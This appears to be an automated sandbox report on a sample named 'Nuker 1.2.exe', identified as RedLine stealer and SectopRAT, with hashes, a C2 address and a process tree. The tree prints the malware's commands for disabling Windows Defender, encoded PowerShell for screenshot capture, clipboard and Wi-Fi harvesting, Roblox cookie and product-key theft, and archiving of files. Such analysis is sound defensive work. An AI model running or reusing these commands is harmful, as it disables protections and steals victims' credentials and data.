Analysis

  • max time kernel
    17s
  • max time network
    21s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-12-2024 00:05

General

  • Target

    Nuker 1.2.exe

  • Size

    6.0MB

  • MD5

    ea52bb50895e85eba81d29a84318cb62

  • SHA1

    198d852c2baf2304e44da82e4ba74d591cf31776

  • SHA256

    7fd20dd1ce4c8e54f077ef9880dd8794158fc2406d66b7656e239f798eacfeee

  • SHA512

    8bbc5061f167f36deea84a909e1df87ac67a53e04195874f6892b73b37a0a79285ed945ae509972721a85c0df1cf5207486978ba870965810d9de8014e87f0f7

  • SSDEEP

    98304:UAmoDUN43W5NjOjFgFEblNHYSxTpirSHcUR43zrwkdA8QJCKC7bN3mb6ag1Rjtj4:UAumWDOjmFwDRxtYSHdK34kdai7bN3mz

Malware Config

Extracted

Family

redline

Botnet

mamut

C2

185.241.208.73:18430

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 61 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Nuker 1.2.exe
    "C:\Users\Admin\AppData\Local\Temp\Nuker 1.2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3624
    • C:\Users\Admin\AppData\Local\Temp\Nuker 1.2.exe
      "C:\Users\Admin\AppData\Local\Temp\Nuker 1.2.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3216
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nuker 1.2.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4796
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nuker 1.2.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:916
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4484
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3952
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3696
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2848
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2184
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1540
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3888
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1668
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4612
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5036
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2900
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2440
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:1400
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4224
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1372
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2996
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4808
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:1612
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:4696
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:2908
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1872
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:1800
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:548
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2516
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bt2tvi0g\bt2tvi0g.cmdline"
              5⤵
                PID:1576
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB239.tmp" "c:\Users\Admin\AppData\Local\Temp\bt2tvi0g\CSCDEE5C07F22A940E880A070255EB4ED77.TMP"
                  6⤵
                    PID:1208
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4708
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:4756
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:5028
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:4600
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:4228
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:4440
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:2992
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:4020
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                          3⤵
                            PID:1772
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3760
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:1016
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:408
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:4764
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3004
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "getmac"
                                  3⤵
                                    PID:1504
                                    • C:\Windows\system32\getmac.exe
                                      getmac
                                      4⤵
                                        PID:4256
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36242\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\mZF93.zip" *"
                                      3⤵
                                        PID:2388
                                        • C:\Users\Admin\AppData\Local\Temp\_MEI36242\rar.exe
                                          C:\Users\Admin\AppData\Local\Temp\_MEI36242\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\mZF93.zip" *
                                          4⤵
                                          • Executes dropped EXE
                                          PID:3684
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                        3⤵
                                          PID:2108
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic os get Caption
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5052
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                          3⤵
                                            PID:2264
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic computersystem get totalphysicalmemory
                                              4⤵
                                                PID:2072
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                              3⤵
                                                PID:4080
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic csproduct get uuid
                                                  4⤵
                                                    PID:60
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                  3⤵
                                                    PID:3212
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2268
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                    3⤵
                                                      PID:2636
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic path win32_VideoController get name
                                                        4⤵
                                                        • Detects videocard installed
                                                        PID:2908
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                      3⤵
                                                        PID:3980
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3488
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                    1⤵
                                                      PID:4440

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                      SHA1

                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                      SHA256

                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                      SHA512

                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      944B

                                                      MD5

                                                      6d3e9c29fe44e90aae6ed30ccf799ca8

                                                      SHA1

                                                      c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                      SHA256

                                                      2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
